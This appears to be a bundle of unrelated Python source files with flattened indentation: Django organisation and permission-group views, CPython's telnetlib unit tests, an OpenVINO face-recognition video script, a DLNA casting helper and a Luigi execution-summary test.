serializer.is_valid(raise_exception=True)
serializer.save()
return Response(UserListSerializer(user, context={'organisation': organisation}).data)
def password_reset_redirect(request, uidb64, token):
protocol = "https" if request.is_secure() else "https"
current_site = get_current_site(request)
domain = current_site.domain
return redirect(protocol + "://" + domain + "/password-reset/" + uidb64 + "/" + token)
@api_view(['POST'])
def join_organisation(request, invite_hash):
invite = get_object_or_404(Invite, hash=invite_hash)
try:
request.user.join_organisation(invite)
except InvalidInviteError as e:
error_data = {'detail': str(e)}
return Response(data=error_data, status=status.HTTP_400_BAD_REQUEST)
if invite.organisation.over_plan_seats_limit():
Thread(target=FFAdminUser.send_organisation_over_limit_alert, args=[invite.organisation]).start()
return Response(OrganisationSerializerFull(invite.organisation, context={'request': request}).data,
status=status.HTTP_200_OK)
class UserPermissionGroupViewSet(viewsets.ModelViewSet):
permission_classes = [IsAuthenticated, UserPermissionGroupPermission]
serializer_class = UserPermissionGroupSerializerDetail
def get_queryset(self):
organisation_pk = self.kwargs.get('organisation_pk')
return UserPermissionGroup.objects.filter(organisation__pk=organisation_pk)
def perform_create(self, serializer):
serializer.save(organisation_id=self.kwargs['organisation_pk'])
def perform_update(self, serializer):
serializer.save(organisation_id=self.kwargs['organisation_pk'])
@swagger_auto_schema(request_body=UserIdsSerializer, responses={200: UserPermissionGroupSerializerDetail})
@action(detail=True, methods=['POST'], url_path='add-users')
def add_users(self, request, organisation_pk, pk):
group = self.get_object()
try:
group.add_users_by_id(request.data['user_ids'])
except FFAdminUser.DoesNotExist as e:
return Response({'detail': str(e)}, status=status.HTTP_400_BAD_REQUEST)
return Response(UserPermissionGroupSerializerDetail(instance=group).data)
@swagger_auto_schema(request_body=UserIdsSerializer, responses={200: UserPermissionGroupSerializerDetail})
@action(detail=True, methods=['POST'], url_path='remove-users')
def remove_users(self, request, organisation_pk, pk):
group = self.get_object()
group.remove_users_by_id(request.data['user_ids'])
return Response(UserPermissionGroupSerializerDetail(instance=group).data)
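# A hypothetical routing sketch (illustration only, not this project's actual
# urls.py, which nests these viewsets under an organisation route so that
# 'organisation_pk' appears in self.kwargs):
#
#     from rest_framework import routers
#     router = routers.DefaultRouter()
#     router.register(r'groups', UserPermissionGroupViewSet, basename='group')
#     urlpatterns = router.urls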
|
test_telnetlib.py
|
import socket
import select
import telnetlib
import time
import contextlib
import unittest
from unittest import TestCase
from test import support
threading = support.import_module('threading')
HOST = support.HOST
def server(evt, serv):
serv.listen(5)
evt.set()
try:
conn, addr = serv.accept()
conn.close()
except socket.timeout:
pass
finally:
serv.close()
class GeneralTests(TestCase):
def setUp(self):
self.evt = threading.Event()
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.sock.settimeout(60)  # Safety net. See issue 11812.
self.port = support.bind_port(self.sock)
self.thread = threading.Thread(target=server, args=(self.evt,self.sock))
self.thread.setDaemon(True)
self.thread.start()
self.evt.wait()
def tearDown(self):
self.thread.join()
def testBasic(self):
# connects
telnet = telnetlib.Telnet(HOST, self.port)
telnet.sock.close()
def testTimeoutDefault(self):
self.assertTrue(socket.getdefaulttimeout() is None)
socket.setdefaulttimeout(30)
try:
telnet = telnetlib.Telnet(HOST, self.port)
finally:
socket.setdefaulttimeout(None)
self.assertEqual(telnet.sock.gettimeout(), 30)
telnet.sock.close()
def testTimeoutNone(self):
# None, having other default
self.assertTrue(socket.getdefaulttimeout() is None)
socket.setdefaulttimeout(30)
try:
telnet = telnetlib.Telnet(HOST, self.port, timeout=None)
finally:
socket.setdefaulttimeout(None)
self.assertTrue(telnet.sock.gettimeout() is None)
telnet.sock.close()
def testTimeoutValue(self):
telnet = telnetlib.Telnet(HOST, self.port, timeout=30)
self.assertEqual(telnet.sock.gettimeout(), 30)
telnet.sock.close()
def testTimeoutOpen(self):
telnet = telnetlib.Telnet()
telnet.open(HOST, self.port, timeout=30)
self.assertEqual(telnet.sock.gettimeout(), 30)
telnet.sock.close()
class SocketStub(object):
''' a socket proxy that re-defines sendall() '''
def __init__(self, reads=()):
self.reads = list(reads) # Intentionally make a copy.
self.writes = []
self.block = False
def sendall(self, data):
self.writes.append(data)
def recv(self, size):
out = b''
while self.reads and len(out) < size:
out += self.reads.pop(0)
if len(out) > size:
self.reads.insert(0, out[size:])
out = out[:size]
return out
class TelnetAlike(telnetlib.Telnet):
def fileno(self):
raise NotImplementedError()
def close(self): pass
def sock_avail(self):
return (not self.sock.block)
def msg(self, msg, *args):
with support.captured_stdout() as out:
telnetlib.Telnet.msg(self, msg, *args)
self._messages += out.getvalue()
return
def mock_select(*s_args):
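    """Stand-in for select.select(): report everything as ready unless the
    TelnetAlike's SocketStub has block=True, in which case nothing is ready."""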
block = False
for l in s_args:
for fob in l:
if isinstance(fob, TelnetAlike):
block = fob.sock.block
if block:
return [[], [], []]
else:
return s_args
class MockPoller(object):
test_case = None # Set during TestCase setUp.
def __init__(self):
self._file_objs = []
def register(self, fd, eventmask):
self.test_case.assertTrue(hasattr(fd, 'fileno'), fd)
self.test_case.assertEqual(eventmask, select.POLLIN|select.POLLPRI)
self._file_objs.append(fd)
def poll(self, timeout=None):
block = False
for fob in self._file_objs:
if isinstance(fob, TelnetAlike):
block = fob.sock.block
if block:
return []
else:
return zip(self._file_objs, [select.POLLIN]*len(self._file_objs))
def unregister(self, fd):
self._file_objs.remove(fd)
@contextlib.contextmanager
def test_socket(reads):
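    """Temporarily monkeypatch socket.create_connection so that Telnet gets a
    SocketStub preloaded with `reads`, restoring the real function on exit."""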
def new_conn(*ignored):
return SocketStub(reads)
try:
old_conn = socket.create_connection
socket.create_connection = new_conn
yield None
finally:
socket.create_connection = old_conn
return
def test_telnet(reads=(), cls=TelnetAlike, use_poll=None):
''' return a telnetlib.Telnet object that uses a SocketStub with
reads queued up to be read '''
for x in reads:
assert type(x) is bytes, x
with test_socket(reads):
telnet = cls('dummy', 0)
telnet._messages = '' # debuglevel output
if use_poll is not None:
if use_poll and not telnet._has_poll:
raise unittest.SkipTest('select.poll() required.')
telnet._has_poll = use_poll
return telnet
class ExpectAndReadTestCase(TestCase):
def setUp(self):
self.old_select = select.select
select.select = mock_select
self.old_poll = False
if hasattr(select, 'poll'):
self.old_poll = select.poll
select.poll = MockPoller
MockPoller.test_case = self
def tearDown(self):
if self.old_poll:
MockPoller.test_case = None
select.poll = self.old_poll
select.select = self.old_select
class ReadTests(ExpectAndReadTestCase):
def test_read_until(self):
"""
read_until(expected, timeout=None)
        test the blocking version of read_until
"""
want = [b'xxxmatchyyy']
telnet = test_telnet(want)
data = telnet.read_until(b'match')
self.assertEqual(data, b'xxxmatch', msg=(telnet.cookedq, telnet.rawq, telnet.sock.reads))
reads = [b'x' * 50, b'match', b'y' * 50]
expect = b''.join(reads[:-1])
telnet = test_telnet(reads)
data = telnet.read_until(b'match')
self.assertEqual(data, expect)
def test_read_until_with_poll(self):
"""Use select.poll() to implement telnet.read_until()."""
want = [b'x' * 10, b'match', b'y' * 10]
telnet = test_telnet(want, use_poll=True)
select.select = lambda *_: self.fail('unexpected select() call.')
data = telnet.read_until(b'match')
self.assertEqual(data, b''.join(want[:-1]))
def test_read_until_with_select(self):
"""Use select.select() to implement telnet.read_until()."""
want = [b'x' * 10, b'match', b'y' * 10]
telnet = test_telnet(want, use_poll=False)
if self.old_poll:
select.poll = lambda *_: self.fail('unexpected poll() call.')
data = telnet.read_until(b'match')
self.assertEqual(data, b''.join(want[:-1]))
def test_read_all(self):
"""
read_all()
Read all data until EOF; may block.
"""
reads = [b'x' * 500, b'y' * 500, b'z' * 500]
expect = b''.join(reads)
telnet = test_telnet(reads)
data = telnet.read_all()
self.assertEqual(data, expect)
return
def test_read_some(self):
"""
read_some()
Read at least one byte or EOF; may block.
"""
# test 'at least one byte'
telnet = test_telnet([b'x' * 500])
data = telnet.read_some()
self.assertTrue(len(data) >= 1)
# test EOF
telnet = test_telnet()
data = telnet.read_some()
self.assertEqual(b'', data)
def _read_eager(self, func_name):
"""
read_*_eager()
Read all data available already queued or on the socket,
without blocking.
"""
want = b'x' * 100
telnet = test_telnet([want])
func = getattr(telnet, func_name)
telnet.sock.block = True
self.assertEqual(b'', func())
telnet.sock.block = False
data = b''
while True:
try:
data += func()
except EOFError:
break
self.assertEqual(data, want)
def test_read_eager(self):
        # read_eager and read_very_eager make the same guarantees
        # (they behave differently but we only test the guarantees)
self._read_eager('read_eager')
self._read_eager('read_very_eager')
# NB -- we need to test the IAC block which is mentioned in the
# docstring but not in the module docs
    def test_read_very_lazy(self):
want = b'x' * 100
telnet = test_telnet([want])
self.assertEqual(b'', telnet.read_very_lazy())
while telnet.sock.reads:
telnet.fill_rawq()
data = telnet.read_very_lazy()
self.assertEqual(want, data)
self.assertRaises(EOFError, telnet.read_very_lazy)
def test_read_lazy(self):
want = b'x' * 100
telnet = test_telnet([want])
self.assertEqual(b'', telnet.read_lazy())
data = b''
while True:
try:
read_data = telnet.read_lazy()
data += read_data
if not read_data:
telnet.fill_rawq()
except EOFError:
break
self.assertTrue(want.startswith(data))
self.assertEqual(data, want)
class nego_collector(object):
def __init__(self, sb_getter=None):
self.seen = b''
self.sb_getter = sb_getter
self.sb_seen = b''
def do_nego(self, sock, cmd, opt):
self.seen += cmd + opt
if cmd == tl.SE and self.sb_getter:
sb_data = self.sb_getter()
self.sb_seen += sb_data
tl = telnetlib
class WriteTests(TestCase):
    '''The only thing that write does is replace each tl.IAC with
tl.IAC+tl.IAC'''
def test_write(self):
data_sample = [b'data sample without IAC',
b'data sample with' + tl.IAC + b' one IAC',
b'a few' + tl.IAC + tl.IAC + b' iacs' + tl.IAC,
tl.IAC,
b'']
for data in data_sample:
telnet = test_telnet()
telnet.write(data)
written = b''.join(telnet.sock.writes)
self.assertEqual(data.replace(tl.IAC,tl.IAC+tl.IAC), written)
class OptionTests(TestCase):
# RFC 854 commands
cmds = [tl.AO, tl.AYT, tl.BRK, tl.EC, tl.EL, tl.GA, tl.IP, tl.NOP]
def _test_command(self, data):
""" helper for testing IAC + cmd """
telnet = test_telnet(data)
data_len = len(b''.join(data))
nego = nego_collector()
telnet.set_option_negotiation_callback(nego.do_nego)
txt = telnet.read_all()
cmd = nego.seen
self.assertTrue(len(cmd) > 0) # we expect at least one command
self.assertIn(cmd[:1], self.cmds)
self.assertEqual(cmd[1:2], tl.NOOPT)
self.assertEqual(data_len, len(txt + cmd))
nego.sb_getter = None # break the nego => telnet cycle
def test_IAC_commands(self):
for cmd in self.cmds:
self._test_command([tl.IAC, cmd])
self._test_command([b'x' * 100, tl.IAC, cmd, b'y'*100])
self._test_command([b'x' * 10, tl.IAC, cmd, b'y'*10])
# all at once
self._test_command([tl.IAC + cmd for (cmd) in self.cmds])
def test_SB_commands(self):
# RFC 855, subnegotiations portion
send = [tl.IAC + tl.SB + tl.IAC + tl.SE,
tl.IAC + tl.SB + tl.IAC + tl.IAC + tl.IAC + tl.SE,
tl.IAC + tl.SB + tl.IAC + tl.IAC + b'aa' + tl.IAC + tl.SE,
tl.IAC + tl.SB + b'bb' + tl.IAC + tl.IAC + tl.IAC + tl.SE,
tl.IAC + tl.SB + b'cc' + tl.IAC + tl.IAC + b'dd' + tl.IAC + tl.SE,
]
telnet = test_telnet(send)
nego = nego_collector(telnet.read_sb_data)
telnet.set_option_negotiation_callback(nego.do_nego)
txt = telnet.read_all()
self.assertEqual(txt, b'')
want_sb_data = tl.IAC + tl.IAC + b'aabb' + tl.IAC + b'cc' + tl.IAC + b'dd'
self.assertEqual(nego.sb_seen, want_sb_data)
self.assertEqual(b'', telnet.read_sb_data())
nego.sb_getter = None # break the nego => telnet cycle
def test_debuglevel_reads(self):
# test all the various places that self.msg(...) is called
given_a_expect_b = [
# Telnet.fill_rawq
(b'a', ": recv b''\n"),
# Telnet.process_rawq
(tl.IAC + bytes([88]), ": IAC 88 not recognized\n"),
(tl.IAC + tl.DO + bytes([1]), ": IAC DO 1\n"),
(tl.IAC + tl.DONT + bytes([1]), ": IAC DONT 1\n"),
(tl.IAC + tl.WILL + bytes([1]), ": IAC WILL 1\n"),
(tl.IAC + tl.WONT + bytes([1]), ": IAC WONT 1\n"),
]
for a, b in given_a_expect_b:
telnet = test_telnet([a])
telnet.set_debuglevel(1)
txt = telnet.read_all()
self.assertIn(b, telnet._messages)
return
def test_debuglevel_write(self):
telnet = test_telnet()
telnet.set_debuglevel(1)
telnet.write(b'xxx')
expected = "send b'xxx'\n"
self.assertIn(expected, telnet._messages)
def test_debug_accepts_str_port(self):
# Issue 10695
with test_socket([]):
telnet = TelnetAlike('dummy', '0')
telnet._messages = ''
telnet.set_debuglevel(1)
telnet.msg('test')
self.assertRegex(telnet._messages, r'0.*test')
class ExpectTests(ExpectAndReadTestCase):
def test_expect(self):
"""
expect(expected, [timeout])
Read until the expected string has been seen, or a timeout is
hit (default is no timeout); may block.
"""
want = [b'x' * 10, b'match', b'y' * 10]
telnet = test_telnet(want)
(_,_,data) = telnet.expect([b'match'])
self.assertEqual(data, b''.join(want[:-1]))
def test_expect_with_poll(self):
"""Use select.poll() to implement telnet.expect()."""
want = [b'x' * 10, b'match', b'y' * 10]
telnet = test_telnet(want, use_poll=True)
select.select = lambda *_: self.fail('unexpected select() call.')
(_,_,data) = telnet.expect([b'match'])
self.assertEqual(data, b''.join(want[:-1]))
def test_expect_with_select(self):
"""Use select.select() to implement telnet.expect()."""
want = [b'x' * 10, b'match', b'y' * 10]
telnet = test_telnet(want, use_poll=False)
if self.old_poll:
select.poll = lambda *_: self.fail('unexpected poll() call.')
(_,_,data) = telnet.expect([b'match'])
self.assertEqual(data, b''.join(want[:-1]))
def test_main(verbose=None):
support.run_unittest(GeneralTests, ReadTests, WriteTests, OptionTests,
ExpectTests)
if __name__ == '__main__':
test_main()
|
modelArchitectureX.py
|
from openvino.inference_engine import IECore
import threading
import time
from multiprocessing import Process
import pickle
import cv2
import os
import numpy as np
from scipy.spatial.distance import cosine
from numpy import load
recognizedIdentity=['']
INPUT_STREAM=r"C:\Users\LENOVO\Downloads\Power Series Finale- Tariq and Ghost Argue.mp4"
#detection model
det_model=r"C:\Users\LENOVO\Desktop\Detect&Recognize\intel\face-detection-0202\FP16\face-detection-0202.xml"
det_weights=os.path.splitext(det_model)[0]+'.bin'
#recognition model
recogModel=r"C:\Users\LENOVO\Desktop\Detect&Recognize\face_net_mobile_face\model-0000.xml"
recogweights=os.path.splitext(recogModel)[0]+'.bin'
#Load the plugin
plugin=IECore()
'''
Preparing the recognition model for the inference engine
'''
recogPlugin=plugin
recogNet=recogPlugin.read_network(model=recogModel,weights=recogweights)
recogExecNet=recogPlugin.load_network(network=recogNet,device_name="MYRIAD")
recog_input_blob=list(recogNet.input_info.keys())[0]
recog_output_blob=next(iter(recogNet.outputs))
rb,rc,rh,rw=recogNet.input_info[recog_input_blob].input_data.shape
'''
Preparing the detection model for the inference engine
'''
detPlugin=plugin
detNet=detPlugin.read_network(model=det_model,weights=det_weights)
detExecNet=detPlugin.load_network(network=detNet,device_name="MYRIAD")
det_input_blob=list(detNet.input_info.keys())[0]
det_output_blob=next(iter(detNet.outputs))
db,dc,dh,dw=detNet.input_info[det_input_blob].input_data.shape
def load_embedding():
pickle_in=open('userEmbeddings.pickle','rb')
return pickle.load(pickle_in)
def is_match(known_embedding,candidate_embedding,thresh=0.55):
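    # Compare the candidate embedding against every enrolled embedding using
    # cosine distance; any distance at or below `thresh` counts as a match and
    # the matching name is written into the shared recognizedIdentity slot.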
for(name,embedding) in known_embedding.items():
score=cosine(embedding,candidate_embedding)
if score<=thresh:
print(name)
recognizedIdentity[0]=name
# else:
# recognizedIdentity.append('Unknown')
# print(recognizedIdentity)
def preprocessing(input_image,height,width):
preprocessed_image=cv2.resize(input_image,(width,height))
preprocessed_image=preprocessed_image.transpose((2,0,1))
preprocessed_image=preprocessed_image.reshape(1,3,height,width)
return preprocessed_image
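# A tiny self-check sketch (added for illustration; the dummy frame is made up):
# preprocessing() converts an HxWx3 BGR frame into the 1x3xHxW NCHW layout
# that the OpenVINO networks above expect.
_dummy_frame = np.zeros((480, 640, 3), dtype=np.uint8)
assert preprocessing(_dummy_frame, 256, 256).shape == (1, 3, 256, 256)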
def perform_facerecognition(face):
p_image=preprocessing(face,rh,rw)
recog_infer_request=recogExecNet.start_async(request_id=0,inputs={recog_input_blob:p_image})
status=recogExecNet.requests[0].wait(-1)
if status==0:
result=recogExecNet.requests[0].outputs[recog_output_blob]
candidate_embedding=result[0]
known_embedding=load_embedding()
x=threading.Thread(target=is_match,daemon=True,args=(known_embedding,candidate_embedding,))
x.start()
x.join()
return recognizedIdentity[0]
def extract_face(image,result,width,height):
for box in result[0][0]:
if box[2]>0.5:
xmin=int(box[3]*width)
ymin=int(box[4]*height)
xmax=int(box[5]*width)
ymax=int(box[6]*height)
face=image[ymin:ymax,xmin:xmax]
text=perform_facerecognition(face)
recognizedIdentity[0]=''
cv2.putText(image,text,(xmin,ymin-10),cv2.FONT_HERSHEY_SIMPLEX,0.9,(36,255,12),2)
cv2.rectangle(image,(xmin,ymin),(xmax,ymax),(0,0,255),1)
image=cv2.rectangle(image,(xmin,ymin),(xmax,ymax),(0,0,255),1)
return image
cap=cv2.VideoCapture(INPUT_STREAM)
while(cap.isOpened()):
    flag,frame=cap.read()
    if not flag:
        # stop when the video ends or a frame cannot be read
        break
width=int(cap.get(3))
height=int(cap.get(4))
pimage=preprocessing(frame,dh,dw)
det_infer_request=detExecNet.start_async(request_id=0,inputs={det_input_blob:pimage})
status=detExecNet.requests[0].wait(-1)
if status==0:
result=detExecNet.requests[0].outputs[det_output_blob]
img=extract_face(frame,result,width,height)
cv2.imshow('frame',img)
k=cv2.waitKey(1) & 0xFF
if k==ord('q'):
break
cap.release()
cv2.destroyAllWindows()
|
app.py
|
#!/usr/bin/env python3
# encoding: UTF-8
import re, socket, os, time, sys, threading, pkgutil, json
from xml.sax.saxutils import escape as xmlescape
from urllib.error import HTTPError
from twisted.internet import reactor
from twisted.web.resource import Resource
from twisted.web.server import Site
from twisted.web.static import File
import xml.etree.ElementTree as ET
if sys.version_info.major == 3:
import urllib.request as urllibreq
import urllib.parse as urllibparse
else:
import urllib2 as urllibreq
import urlparse as urllibparse
SSDP_BROADCAST_PORT = 1900
SSDP_BROADCAST_ADDR = "239.255.255.250"
SSDP_GROUP = (SSDP_BROADCAST_ADDR, SSDP_BROADCAST_PORT)
SSDP_BROADCAST_PARAMS = [
"M-SEARCH * HTTP/1.1",
"HOST: %s:%d" % SSDP_GROUP,
"MAN: \"ssdp:discover\"",
"MX: 10", #10/3 ?
"ST: ssdp:all",
"",
""]
SSDP_BROADCAST_MSG = "\r\n".join(SSDP_BROADCAST_PARAMS)
UPNP_DEFAULT_SERVICE_TYPE = "urn:schemas-upnp-org:service:AVTransport:1"
class dlnaTv:
def __init__(self):
'''
        dlnaTv object that starts a DLNA connection to a compatible TV
'''
self.time = 12.0 #seems like 12 seconds is the sweet spot
self.ports = 9000
def get_devices(self, timeout=10.0):
'''
        Search the local network for devices exposing the UPnP AVTransport service used for DLNA casting.
        timeout : <float> how long to keep listening for responses before the search stops;
                  a higher timeout increases the chance of finding a device
'''
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
s.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 4)
s.bind(("", SSDP_BROADCAST_PORT + 10))
s.sendto(SSDP_BROADCAST_MSG.encode("UTF-8"), SSDP_GROUP)
s.settimeout(timeout)
devices = []
while True:
try:
data, ip = s.recvfrom(4096)
except socket.timeout:
s.close()
break
try:
info = [a.split(":", 1) for a in data.decode("UTF-8").split("\r\n")[1:]]
device = dict([(a[0].strip().lower(), a[1].strip()) for a in info if len(a) >= 2])
devices.append(device)
            except Exception:
                # skip malformed SSDP responses and keep listening on the socket
                continue
s.close()
devices_urls = [dev["location"] for dev in devices if "AVTransport" in dev["st"]]
devices = [self.register_device(location_url) for location_url in devices_urls]
return devices
def register_device(self, location_url):
'''
        Build the device info needed to communicate with the renderer.
        return <dict> containing the device info
'''
xml = urllibreq.urlopen(location_url).read().decode("UTF-8")
xml = re.sub(" xmlns=\"[^\"]+\"", "", xml, count=1)
info = ET.fromstring(xml)
location = urllibparse.urlparse(location_url)
hostname = location.hostname
friendly_name = info.find("./device/friendlyName").text
path = info.find("./device/serviceList/service/[serviceType='{0}']/controlURL".format(UPNP_DEFAULT_SERVICE_TYPE)).text
action_url = urllibparse.urljoin(location_url, path)
device = {
"location": location_url,
"hostname": hostname,
"friendly_name": friendly_name,
"action_url": action_url,
"st": UPNP_DEFAULT_SERVICE_TYPE
}
return device
def set_files(self, files, serve_ip, serve_port):
'''
build url to file for dlna stream
'''
files_index = {file_key: (os.path.basename(file_path),
os.path.abspath(file_path),
os.path.dirname(os.path.abspath(file_path)))
for file_key, file_path in files.items()}
files_serve = {file_name: file_path
for file_name, file_path, file_dir in files_index.values()}
files_urls = {
file_key: "http://{0}:{1}/{2}/{3}".format(serve_ip, self.ports, file_key, file_name)
for file_key, (file_name, file_path, file_dir)
in files_index.items()}
return files_index, files_serve, files_urls
def start_server(self, files, serve_ip):
'''
create a server to stream a video
'''
files_index, files_serve, files_urls = self.set_files(files, serve_ip, self.ports)
root = Resource()
for file_key, (file_name, file_path, file_dir) in files_index.items():
root.putChild(file_key.encode("utf-8"), Resource())
root.children[file_key.encode("utf-8")].putChild(
file_name.encode("utf-8"), File(file_path))
if not reactor.running:
reactor.listenTCP(self.ports, Site(root))
threading.Thread(target=reactor.run, kwargs={"installSignalHandlers": False}).start()
else:
reactor.listenTCP(self.ports, Site(root))
return files_urls
def get_serve_ip(self, target_ip, target_port=80):
'''
get local device IP
return <str> ip
'''
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect((target_ip, target_port))
serve_ip = s.getsockname()[0]
s.close()
return serve_ip
def send_dlna_action(self, device, data, action):
'''
send a dlna action to a device
'''
#action_data = pkgutil.get_data(
# "nanodlna", "templates/action-{0}.xml".format(action)).decode("UTF-8")
with open("{0}\\xml\\action-{1}.xml".format(os.path.dirname(__file__), action), 'r') as e:
action_data = e.read()
e.close()
action_data = action_data.format(**data).encode("UTF-8")
headers = {
"Content-Type": "text/xml; charset=\"utf-8\"",
"Content-Length": "{0}".format(len(action_data)),
"Connection": "close",
"SOAPACTION": "\"{0}#{1}\"".format(device["st"], action)
}
request = urllibreq.Request(device["action_url"], action_data, headers)
try:
urllibreq.urlopen(request)
except HTTPError as e:
content = e.read()
print(content)
def start_dlna(self, filePath, deviceUrl, action, file_url=None):
'''
preparation to start a DLNA cast
filePath : <str> path to the file to play
deviceUrl : <dict> device info needed to start the stream (must contain 'location')
action : <str> action to perform
-> Play
-> Stop
-> Seek
'''
files = {"file_video" : filePath}
device = self.register_device(deviceUrl['location'])
# Configure streaming server
target_ip = device["hostname"]
serve_ip = self.get_serve_ip(target_ip)
try:
files_urls = self.start_server(files, serve_ip)
except Exception as e:
if type(file_url) is dict:
files_urls = file_url
print(file_url)
print(files_urls)
video_data = {
"uri_video": files_urls["file_video"],
"type_video": os.path.splitext(files_urls["file_video"])[1][1:],
}
video_data["metadata"] = ""
try: # try to set up file on TV
self.send_dlna_action(device, video_data, "SetAVTransportURI")
except Exception as e:
pass
self.send_dlna_action(device, video_data, action)
print(action)
return files_urls
def main():
return dlnaTv()
if __name__ == "__main__":
a = dlnaTv()
file = r"C:\Users\MARK\Desktop\Explorer\VZ Anime\download here\dw\valerian.mp4"
#a.set_files({"file_video":r"C:\Java\Visual Basic Code\source\mirror 4.0\ABSOLUTE5\Jainbo\media\t.mp4"}, '192.168.1.2', '9000')
#a.start_dlna(file,
# {'location':"http://192.168.1.7:57351"}, "Stop")
#a.start_dlna(file,
# {'location':"http://192.168.1.7:57351"}, "Play")
#time.sleep(10)
a.start_dlna(file,
{'location':"http://192.168.1.7:57351"}, "Seek")
|
execution_summary_test.py
|
# -*- coding: utf-8 -*-
#
# Copyright 2015-2015 Spotify AB
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from helpers import LuigiTestCase, RunOnceTask, with_config
import luigi
import luigi.worker
import luigi.execution_summary
import threading
import datetime
import mock
from enum import Enum
class ExecutionSummaryTest(LuigiTestCase):
def setUp(self):
super(ExecutionSummaryTest, self).setUp()
self.scheduler = luigi.scheduler.CentralPlannerScheduler(prune_on_get_work=False)
self.worker = luigi.worker.Worker(scheduler=self.scheduler)
def run_task(self, task):
self.worker.add(task) # schedule
self.worker.run() # run
def summary_dict(self):
return luigi.execution_summary._summary_dict(self.worker)
def summary(self):
return luigi.execution_summary.summary(self.worker)
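# Every test below follows the same pattern (sketch): define some luigi.Task /
# RunOnceTask classes inline, schedule the root task with run_task(), then assert
# on the buckets returned by summary_dict() (e.g. 'completed', 'failed',
# 'already_done', 'still_pending_ext') and/or on the rendered text from summary().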
def test_all_statuses(self):
class Bar(luigi.Task):
num = luigi.IntParameter()
def run(self):
if self.num == 0:
raise ValueError()
def complete(self):
if self.num == 1:
return True
return False
class Foo(luigi.Task):
def requires(self):
for i in range(5):
yield Bar(i)
self.run_task(Foo())
d = self.summary_dict()
self.assertEqual({Bar(num=1)}, d['already_done'])
self.assertEqual({Bar(num=2), Bar(num=3), Bar(num=4)}, d['completed'])
self.assertEqual({Bar(num=0)}, d['failed'])
self.assertEqual({Foo()}, d['upstream_failure'])
self.assertFalse(d['upstream_missing_dependency'])
self.assertFalse(d['run_by_other_worker'])
self.assertFalse(d['still_pending_ext'])
summary = self.summary()
expected = ['',
'===== Luigi Execution Summary =====',
'',
'Scheduled 6 tasks of which:',
'* 1 present dependencies were encountered:',
' - 1 Bar(num=1)',
'* 3 ran successfully:',
' - 3 Bar(num=2,3,4)',
'* 1 failed:',
' - 1 Bar(num=0)',
'* 1 were left pending, among these:',
' * 1 had failed dependencies:',
' - 1 Foo()',
'',
'This progress looks :( because there were failed tasks',
'',
'===== Luigi Execution Summary =====',
'']
result = summary.split('\n')
self.assertEqual(len(result), len(expected))
for i, line in enumerate(result):
self.assertEqual(line, expected[i])
def test_check_complete_error(self):
class Bar(luigi.Task):
def run(self):
pass
def complete(self):
raise Exception
return True
class Foo(luigi.Task):
def requires(self):
yield Bar()
self.run_task(Foo())
d = self.summary_dict()
self.assertEqual({Foo()}, d['still_pending_not_ext'])
self.assertEqual({Foo()}, d['upstream_scheduling_error'])
self.assertEqual({Bar()}, d['scheduling_error'])
self.assertFalse(d['unknown_reason'])
self.assertFalse(d['already_done'])
self.assertFalse(d['completed'])
self.assertFalse(d['failed'])
self.assertFalse(d['upstream_failure'])
self.assertFalse(d['upstream_missing_dependency'])
self.assertFalse(d['run_by_other_worker'])
self.assertFalse(d['still_pending_ext'])
summary = self.summary()
expected = ['',
'===== Luigi Execution Summary =====',
'',
'Scheduled 2 tasks of which:',
'* 1 failed running complete() or requires():',
' - 1 Bar()',
'* 1 were left pending, among these:',
" * 1 had dependencies whose complete() or requires() failed:",
' - 1 Foo()',
'',
'Did not run any tasks',
'This progress looks :( because there were tasks whose complete() or requires() failed',
'',
'===== Luigi Execution Summary =====',
'']
result = summary.split('\n')
self.assertEqual(len(result), len(expected))
for i, line in enumerate(result):
self.assertEqual(line, expected[i])
def test_deps_error(self):
class Bar(luigi.Task):
def run(self):
pass
def complete(self):
return True
class Foo(luigi.Task):
def requires(self):
raise Exception
yield Bar()
self.run_task(Foo())
d = self.summary_dict()
self.assertEqual({Foo()}, d['scheduling_error'])
self.assertFalse(d['upstream_scheduling_error'])
self.assertFalse(d['unknown_reason'])
self.assertFalse(d['already_done'])
self.assertFalse(d['completed'])
self.assertFalse(d['failed'])
self.assertFalse(d['upstream_failure'])
self.assertFalse(d['upstream_missing_dependency'])
self.assertFalse(d['run_by_other_worker'])
self.assertFalse(d['still_pending_ext'])
summary = self.summary()
expected = ['',
'===== Luigi Execution Summary =====',
'',
'Scheduled 1 tasks of which:',
'* 1 failed running complete() or requires():',
' - 1 Foo()',
'',
'Did not run any tasks',
'This progress looks :( because there were tasks whose complete() or requires() failed',
'',
'===== Luigi Execution Summary =====',
'']
result = summary.split('\n')
self.assertEqual(len(result), len(expected))
for i, line in enumerate(result):
self.assertEqual(line, expected[i])
@with_config({'execution_summary': {'summary-length': '1'}})
def test_config_summary_limit(self):
class Bar(luigi.Task):
num = luigi.IntParameter()
def run(self):
pass
def complete(self):
return True
class Biz(Bar):
pass
class Bat(Bar):
pass
class Wut(Bar):
pass
class Foo(luigi.Task):
def requires(self):
yield Bat(1)
yield Wut(1)
yield Biz(1)
for i in range(4):
yield Bar(i)
def complete(self):
return False
self.run_task(Foo())
d = self.summary_dict()
self.assertEqual({Bat(1), Wut(1), Biz(1), Bar(0), Bar(1), Bar(2), Bar(3)}, d['already_done'])
self.assertEqual({Foo()}, d['completed'])
self.assertFalse(d['failed'])
self.assertFalse(d['upstream_failure'])
self.assertFalse(d['upstream_missing_dependency'])
self.assertFalse(d['run_by_other_worker'])
self.assertFalse(d['still_pending_ext'])
summary = self.summary()
expected = ['',
'===== Luigi Execution Summary =====',
'',
'Scheduled 8 tasks of which:',
'* 7 present dependencies were encountered:',
' - 4 Bar(num=0...3)',
' ...',
'* 1 ran successfully:',
' - 1 Foo()',
'',
'This progress looks :) because there were no failed tasks or missing external dependencies',
'',
'===== Luigi Execution Summary =====',
'']
result = summary.split('\n')
self.assertEqual(len(result), len(expected))
for i, line in enumerate(result):
self.assertEqual(line, expected[i])
